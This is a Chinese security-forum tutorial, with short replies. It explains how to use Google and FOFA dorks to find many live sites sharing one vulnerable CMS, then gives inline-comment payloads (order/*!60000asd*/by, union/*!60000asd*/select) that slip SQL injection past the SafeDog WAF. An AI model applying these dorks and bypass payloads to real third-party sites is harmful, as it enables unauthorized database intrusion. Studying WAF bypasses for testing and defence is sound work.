用户
搜索
  • TA的每日心情
    开心
    2020-9-5 15:04
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

    i春秋-脚本小子

    Rank: 2

    2

    主题

    18

    帖子

    176

    魔法币
    收听
    0
    粉丝
    1
    注册时间
    2020-9-5
    发表于 2020-9-27 10:50:05 87824

    自我介绍:

    大家好,我是鬼碟丶,这是我来到i春秋写的第四篇原创文章。

    我写文章向来是尽可能的把各种思路写在一起,而不是分散着些,所以我在网上收集了个人认为不错的思路以及自己在挖掘过程中的思路,然后融入到本文章当中,争取让大家能够学到这方面更多的知识和思路。

    我写文章就是带着耳机,循环放着自己喜欢的歌单,翻阅各种历史文章,然后一边写一边思考,写完了然后总体检阅一遍。在我想构思第四篇应该写什么的时候,其实我很久以前就想过了,只不过我把它放在了我的第四篇文章当中,所以,本文章思路很多,当然我也会找相关的思路例子以更好地助于吸收学习,有些例子找不到那么我尽可能的用文字来描述的详细一些。

    QQ:914659453,希望能与更多志同道合的朋友一起交流学习。

    本篇分享大纲:

    1. 主流浏览器安装谷歌助手插件。
    2. 分享谷歌找通杀技巧。
    3. Bypass最简单的技巧。

    一、首先介绍一下今天的漏洞:

    今天要说的通杀漏洞主要是SQL注入,其次是遇到WAF以后,如何Bypass。

    SQL注入的原理必须要熟记于心:

    1. 用户能够控制输入数据 。
    2. 能够将用户输入的数据拼接进去执行。

    二、安装插件:

    首先安装谷歌插件,该插件我会以附件的形式放在文章最下方(害怕有木马的,弟弟也没得办法)。

    Firefox火狐浏览器可能暂时不支持,也或许弟弟不知道,如果有可以用的大佬麻烦告诉弟弟。

    360极速浏览器:

    第一步:

    第二步:

    由于这个步骤没办法截图,我也懒得做GIF动图了。大家能理解就自己操作,不行的话就加我QQ。

    Google Chrome谷歌浏览器:

    第一步:

    第二步:

    由于这个步骤没办法截图,我也懒得做GIF动图了。大家能理解就自己操作,不行的话就加我QQ。

    三:谷歌语法:

    科普一下谷歌语法,虽然网上一大堆谷歌语法的教程。但是我立志写一篇最详细的。

    这里是本次用到的:

    site:指定域名,例:site:edu.cn 列出所有域名带有edu.cn的网站
    inurl:指定url/目录/脚本语言,例:inurl:login.php 列出所有url中带有login.php的网站
    intitle:指定网站标题,title部分,例:intitle:后台管理 列出标题为后台管理的网站
    link:搜索链接到所输入URL的页面,该操作符不需要关键字,不能与其他操作符及关键字混用
    intext:把网页中的正文内容中的某个字符做为搜索条件(但是只能搜索冒号后接的一个关键字)
    双引号":强制搜索被双引号引用的内容

    谷歌语法参考链接:

    https://blog.csdn.net/u013589137/article/details/82758762

    http://blog.sina.com.cn/s/blog_b4cbba7e0102x567.html

    更多语法就不在这里讲解了,大家有兴趣可以继续去寻找。

    四:准备就绪,战斗开启:

    事先声明,本篇文章所涉及到的漏洞均已提交SRC平台。希望小伙伴们可以发挥自己的思路,本文章只是给你们提供思路,具体情况自己发挥。

    之前我用谷歌语法找注入,找到了很多。然后偶尔一次发现存在注入漏洞的网站下方都会有一个技术支持,然后通过技术支持找到了很多一样的网站,判断为CMS,这就成就了所谓的通杀。

    谷歌语法:site:cn inurl:php?id=1 intitle:公司

    通过这种方法会找到很多存在注入漏洞的网站(这里我觉得没必要进行打码,因为毕竟很多人都可以找到),当然语法不是固定的,inurl可以指定别的注入关键字,这些还是需要大家自己去收集了。

    这里找到一个:http://www.xxxxxxxx.cn/m/brand_list.php?id=3 测试存在注入,看着像CMS。别问我为什么,因为我之前遇到过这种的。返回首页看一下技术支持。

    点开网站建设,发现是xx网络。

    这里有两个思路:

        1. 进入xx网络的官网,查看网站案例(如果没有,看下一个)
    
              2. 搜索引擎搜索关键字

    第一个思路:

    进入xx网络的官网,查看网站案例。

    这里虽然有案例作品,但是并没有写案例官网,所以略过。

    第二个思路:

    FOFA语法:

    "xx网络" && country="CN"

    大概出现这三种,确认是一个cms,但是FOFA只搜索到了一点站,案例不够怎么办?搜索引擎这么多,干嘛非得他一家。

    谷歌语法:

    inurl:php  "济南xx网络"

    这些案例肯定够了。

    说实话,这个案例是我在写这边文章的时候找到了。。。

    还有一点就是最简单找通杀的谷歌语法:

    inurl:注入关键字 "技术支持:"

    五:Bypass的案例:

    这些案例是我之前找的注入点,过了几个月发现有技术支持,然后url基本一样,就发现的通杀。
    这里先说一下payload:

    /*!60000asd*/            WAF过滤哪些关键词就写在哪些中间,例如:order/*!60000sad*/by 1 或 系统函数:user/**/() 或 database/**/(),等

    这里再解释一下Payload:

    /*!*/   属于内联注释
    asd     属于填充代码,必须有,可以随便输
    60000   属于数据库版本号,为5位数,可换成其他5位数号码(只要能过狗)

    安全狗:

    谷歌语法:

    inurl:about.php?id=1 "xx建站"

    找到很多同一CMS的站点,开始注入。

    进去以后正常页面。

    添加单引号:

    and 1=1                 拦截
    and -1=-1                 不拦截
    and 1=2                        拦截
    and -1=-2                不拦截

    报错存在注入,既然确定存在注入,就直接order by。

    存在WAF,安全狗,利用上面我提到的语句来绕过。

    order/*!60000asd*/by 字段数 limit 1,1

    成功绕过。

    下面联合查询,union select。

    正常写联合查询被拦截。

    还是用上面提到的Payload来绕过。

    union/*!60000asd*/select 1,2,3,4 limit 1,1

    成功绕过,系统函数也是同样的道理绕过。

    由于时间关系,没时间写那么多,请大家给小弟一些时间。

                                        下篇预告:通杀挖掘之bypass云锁

    谷歌访问助手_v2.3.0.zip

    101.04 KB, 下载次数: 5, 下载积分: 魔法币 -5

    这个思路确实不错  
    使用道具 举报 回复
    思路可以的
    使用道具 举报 回复
    发表于 2020-9-27 17:33:32
    学习一下
    使用道具 举报 回复
    发表于 2020-9-27 18:48:21
    看看,不说话
    使用道具 举报 回复
    发表于 2020-9-27 19:28:00

    多谢大佬不喷我
    使用道具 举报 回复
    发表于 2020-9-29 08:13:16
    写 的很详细,总体思路还是值得学习的
    有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫大叔 这个网络他曾来过
    使用道具 举报 回复
    发表于 2020-9-29 18:03:09
    还是不错的
    使用道具 举报 回复
    感谢分享
    剑未佩妥出门已是江湖
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册